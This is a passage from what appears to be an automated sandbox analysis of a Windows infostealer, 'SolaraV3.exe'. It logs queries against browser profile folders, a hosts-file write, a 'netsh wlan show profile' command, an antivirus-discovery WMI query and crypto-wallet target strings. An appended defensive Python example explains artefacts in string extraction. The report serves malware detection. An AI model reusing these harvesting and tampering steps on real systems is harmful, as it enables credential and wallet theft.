Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00007FF6DC70D010
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC725E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 1_2_00007FF6DC725E7C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EEB48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW, 110_2_00007FF74EEB48CC
Source: C:\Users\user\Desktop\SolaraV3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\SolaraV3.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED
Source: Yara match File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: EthereumZ
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystoreZ
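The stray trailing letter on four of the five wallet strings above (Jaxxz, Exodusz, EthereumZ, keystoreZ) is worth understanding before these strings go into an IOC or Yara list. This is an added example, not part of the report, and it rests on one assumption: that the strings were read out of marshalled Python code objects inside the PyInstaller payload the report identified. Python's marshal format writes a short ASCII string as a type byte ('z' for a plain string, 'Z' for an interned one, either possibly OR'd with the 0x80 reference flag), a one-byte length, then the characters, so a byte-oriented strings extractor glues the next object's type byte onto the end of each string. The blob below is constructed by hand to show the effect; it is not data from the sample. The naive extractor reproduces the report's artefact, the marshal-aware carve recovers the exact names, and the real decoder confirms the carve.

```python
"""Recovering wallet-related strings from a marshalled Python constants tuple.

Added example; assumes the strings come from marshalled Python code objects
(PyInstaller payload).  SAMPLE_BLOB is constructed, not taken from the sample.
"""
import marshal
import re
import struct

# Wallet names taken from the report's own string hits.
WALLET_KEYWORDS = ("Electrum", "Jaxx", "Exodus", "Ethereum", "keystore")

TYPE_SHORT_ASCII = 0x7A           # 'z'
TYPE_SHORT_ASCII_INTERNED = 0x5A  # 'Z'
FLAG_REF = 0x80                   # may be OR'd onto the type byte by marshal


def _short_ascii(s, interned=False):
    """Encode s the way marshal encodes a short (<256 byte) ASCII string."""
    data = s.encode("ascii")
    code = TYPE_SHORT_ASCII_INTERNED if interned else TYPE_SHORT_ASCII
    return bytes([code, len(data)]) + data


# Constructed stand-in for a co_consts tuple: '(' + 4-byte count + items.
# The interned/plain mix is chosen so a naive extractor yields exactly the
# report's "Jaxxz", "Exodusz", "EthereumZ", "keystoreZ", "Electrum".
SAMPLE_BLOB = (
    b"(" + struct.pack("<i", 5)
    + _short_ascii("Jaxx")
    + _short_ascii("Exodus")
    + _short_ascii("Ethereum")
    + _short_ascii("keystore", interned=True)
    + _short_ascii("Electrum", interned=True)
)


def naive_strings(blob):
    """What a byte-oriented strings tool sees: runs of >=4 printable ASCII bytes.
    Each string swallows the following object's printable type byte."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{4,}", blob)]


def carve_marshal_short_ascii(blob, min_len=4):
    """Carve short-ASCII marshal strings: type byte ('z'/'Z', ref flag ignored),
    one length byte, then that many printable ASCII bytes.  No full parse needed."""
    out, i = [], 0
    while i < len(blob) - 1:
        code, n = blob[i] & ~FLAG_REF, blob[i + 1]
        if code in (TYPE_SHORT_ASCII, TYPE_SHORT_ASCII_INTERNED) and n >= min_len:
            s = blob[i + 2:i + 2 + n]
            if len(s) == n and all(0x20 <= b < 0x7F for b in s):
                out.append(s.decode("ascii"))
                i += 2 + n
                continue
        i += 1
    return out


def decode_with_marshal(blob):
    """Ground truth: let the real marshal decoder read the constructed tuple."""
    return marshal.loads(blob)


def wallet_hits(strings, keywords=WALLET_KEYWORDS):
    """Map each wallet keyword to the extracted strings containing it (case-insensitive)."""
    hits = {}
    for k in keywords:
        matched = [s for s in strings if k.lower() in s.lower()]
        if matched:
            hits[k] = matched
    return hits


if __name__ == "__main__":
    print("naive :", naive_strings(SAMPLE_BLOB))
    print("carved:", carve_marshal_short_ascii(SAMPLE_BLOB))
    print("loads :", decode_with_marshal(SAMPLE_BLOB))
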